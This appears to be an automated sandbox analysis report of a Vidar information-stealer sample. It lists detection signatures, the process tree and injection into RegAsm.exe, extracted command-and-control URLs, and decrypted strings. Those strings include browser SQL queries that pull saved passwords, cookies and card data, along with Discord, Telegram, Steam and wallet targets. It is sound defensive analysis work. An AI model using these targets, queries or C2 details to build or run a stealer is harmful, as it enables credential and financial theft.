Windows Analysis Report
56bDgH9sMQ.exe

Overview

General Information

Sample name:56bDgH9sMQ.exe
renamed because original name is a hash value
Original sample name:f88272ea7674d3acedd8adcf7643c598.exe
Analysis ID:1465067
MD5:f88272ea7674d3acedd8adcf7643c598
SHA1:0066fd44e2cd9293af414f735bd80456f4e3eb1d
SHA256:fad264acc346be1e63cd47611cd305cb9c894a13843119e22e87744808295387
Tags:32exetrojan
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign processes
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 56bDgH9sMQ.exe (PID: 7736 cmdline: "C:\Users\user\Desktop\56bDgH9sMQ.exe" MD5: F88272EA7674D3ACEDD8ADCF7643C598)
    • RegAsm.exe (PID: 7760 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 7768 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • WerFault.exe (PID: 7844 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7736 -s 324 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"C2 url": ["https://steamcommunity.com/profiles/76561199707802586", "https://t.me/g067n"], "Botnet": "254862acdd5c5d2dddb209d751490c15"}
Source | Rule | Description | Author | Strings
00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp | HiddenCobra_BANKSHOT_Gen | Detects Hidden Cobra BANKSHOT trojan | Florian Roth
  • 0x3393a:$x5: vchost.exe
  • 0x3593a:$x5: vchost.exe
00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
Process Memory Space: 56bDgH9sMQ.exe PID: 7736 | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
Source | Rule | Description | Author | Strings
2.2.RegAsm.exe.42e038.1.raw.unpack | HiddenCobra_BANKSHOT_Gen | Detects Hidden Cobra BANKSHOT trojan | Florian Roth
  • 0x5902:$x5: vchost.exe
  • 0x7902:$x5: vchost.exe
2.2.RegAsm.exe.400000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
2.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
0.2.56bDgH9sMQ.exe.c60000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
2.2.RegAsm.exe.400000.0.raw.unpack | HiddenCobra_BANKSHOT_Gen | Detects Hidden Cobra BANKSHOT trojan | Florian Roth
  • 0x3393a:$x5: vchost.exe
  • 0x3593a:$x5: vchost.exe
No Sigma rule has matched
No Snort rule has matched

                AV Detection

                Source: 56bDgH9sMQ.exeAvira: detected
                Source: https://steamcommunity.com/profiles/76561199707802586Avira URL Cloud: Label: malware
                Source: https://t.me/g067nAvira URL Cloud: Label: malware
                Source: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199707802586", "https://t.me/g067n"], "Botnet": "254862acdd5c5d2dddb209d751490c15"}
                Source: https://195.201.251.214:9000/Virustotal: Detection: 6%
                Source: 56bDgH9sMQ.exeReversingLabs: Detection: 78%
                Source: 56bDgH9sMQ.exeVirustotal: Detection: 81%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: 56bDgH9sMQ.exeJoe Sandbox ML: detected
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: INSERT_KEY_HERE
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetProcAddress
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: LoadLibraryA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: lstrcatA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: OpenEventA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CreateEventA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CloseHandle
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Sleep
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetUserDefaultLangID
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: VirtualAllocExNuma
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: VirtualFree
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetSystemInfo
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: VirtualAlloc
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: HeapAlloc
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetComputerNameA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: lstrcpyA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetProcessHeap
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetCurrentProcess
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: lstrlenA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: ExitProcess
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GlobalMemoryStatusEx
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetSystemTime
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: SystemTimeToFileTime
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: advapi32.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: gdi32.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: user32.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: crypt32.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: ntdll.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetUserNameA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CreateDCA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetDeviceCaps
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: ReleaseDC
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CryptStringToBinaryA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: sscanf
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: NtQueryInformationProcess
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: VMwareVMware
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: HAL9TH
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: JohnDoe
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: DISPLAY
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: %hu/%hu/%hu
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetEnvironmentVariableA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetFileAttributesA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GlobalLock
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: HeapFree
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetFileSize
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GlobalSize
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CreateToolhelp32Snapshot
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: IsWow64Process
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Process32Next
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetLocalTime
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: FreeLibrary
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetTimeZoneInformation
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetSystemPowerStatus
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetVolumeInformationA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetWindowsDirectoryA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Process32First
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetLocaleInfoA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetUserDefaultLocaleName
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetModuleFileNameA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: DeleteFileA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: FindNextFileA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: LocalFree
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: FindClose
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: SetEnvironmentVariableA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: LocalAlloc
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetFileSizeEx
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: ReadFile
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: SetFilePointer
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: WriteFile
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CreateFileA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: FindFirstFileA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CopyFileA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: VirtualProtect
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetLogicalProcessorInformationEx
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetLastError
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: lstrcpynA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: MultiByteToWideChar
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GlobalFree
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: WideCharToMultiByte
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GlobalAlloc
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: OpenProcess
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: TerminateProcess
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetCurrentProcessId
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: gdiplus.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: ole32.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: bcrypt.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: wininet.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: shlwapi.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: shell32.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: psapi.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: rstrtmgr.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CreateCompatibleBitmap
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: SelectObject
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: BitBlt
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: DeleteObject
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CreateCompatibleDC
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GdipGetImageEncodersSize
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GdipGetImageEncoders
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GdiplusStartup
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GdiplusShutdown
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GdipSaveImageToStream
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GdipDisposeImage
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GdipFree
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetHGlobalFromStream
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CreateStreamOnHGlobal
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CoUninitialize
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CoInitialize
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CoCreateInstance
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: BCryptGenerateSymmetricKey
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: BCryptCloseAlgorithmProvider
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: BCryptDecrypt
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: BCryptSetProperty
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: BCryptDestroyKey
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: BCryptOpenAlgorithmProvider
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetWindowRect
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetDesktopWindow
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetDC
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CloseWindow
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: wsprintfA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: EnumDisplayDevicesA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetKeyboardLayoutList
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CharToOemW
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: wsprintfW
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: RegQueryValueExA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: RegEnumKeyExA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: RegOpenKeyExA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: RegCloseKey
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: RegEnumValueA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CryptBinaryToStringA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CryptUnprotectData
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: SHGetFolderPathA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: ShellExecuteExA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: InternetOpenUrlA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: InternetConnectA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: InternetCloseHandle
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: InternetOpenA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: HttpSendRequestA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: HttpOpenRequestA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: InternetReadFile
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: InternetCrackUrlA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: StrCmpCA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: StrStrA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: StrCmpCW
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: PathMatchSpecA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: GetModuleFileNameExA
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: RmStartSession
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: RmRegisterResources
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: RmGetList
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: RmEndSession
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: sqlite3_open
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: sqlite3_prepare_v2
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: sqlite3_step
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: sqlite3_column_text
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: sqlite3_finalize
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: sqlite3_close
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: sqlite3_column_bytes
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: sqlite3_column_blob
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: encrypted_key
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: PATH
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: C:\ProgramData\nss3.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: NSS_Init
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: NSS_Shutdown
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: PK11_GetInternalKeySlot
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: PK11_FreeSlot
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: PK11_Authenticate
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: PK11SDR_Decrypt
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: C:\ProgramData\
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Soft:
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: profile:
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Host:
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Login:
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Password:
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Opera
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: OperaGX
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Network
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Cookies
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: .txt
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: TRUE
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: FALSE
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Autofill
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: SELECT name, value FROM autofill
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: History
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Name:
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Month:
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Year:
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Card:
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Cookies
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Login Data
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Web Data
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: History
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: logins.json
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: formSubmitURL
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: usernameField
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: encryptedUsername
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: encryptedPassword
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: guid
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: cookies.sqlite
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: formhistory.sqlite
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: places.sqlite
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Plugins
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Local Extension Settings
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Sync Extension Settings
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: IndexedDB
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Opera Stable
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Opera GX Stable
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: CURRENT
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: chrome-extension_
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: _0.indexeddb.leveldb
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Local State
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: profiles.ini
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: chrome
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: opera
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: firefox
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Wallets
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: %08lX%04lX%lu
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: ProductName
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: %d/%d/%d %d:%d:%d
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: ProcessorNameString
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: DisplayName
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: DisplayVersion
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: freebl3.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: mozglue.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: msvcp140.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: nss3.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: softokn3.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: vcruntime140.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: \Temp\
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: .exe
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: runas
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: open
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: /c start
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: %DESKTOP%
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: %APPDATA%
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: %LOCALAPPDATA%
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: %USERPROFILE%
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: %DOCUMENTS%
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: %PROGRAMFILES%
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: %PROGRAMFILES_86%
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: %RECENT%
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: *.lnk
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Files
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: \discord\
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: \Local Storage\leveldb\CURRENT
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: \Local Storage\leveldb
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: \Telegram Desktop\
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: key_datas
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: D877F783D5D3EF8C*
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: map*
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: A7FDF864FBC10B77*
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: A92DAA6EA6F891F2*
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: F8806DD0C461824F*
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Telegram
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: *.tox
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: *.ini
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Password
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: 00000001
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: 00000002
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: 00000003
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: 00000004
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: \Outlook\accounts.txt
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Pidgin
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: \.purple\
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: accounts.xml
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: dQw4w9WgXcQ
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: token:
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Software\Valve\Steam
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: SteamPath
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: \config\
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: ssfn*
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: config.vdf
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: DialogConfig.vdf
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: DialogConfigOverlay*.vdf
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: libraryfolders.vdf
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: loginusers.vdf
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: \Steam\
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: sqlite3.dll
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: browsers
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: done
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Soft
                Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: \Discord\tokens.txt
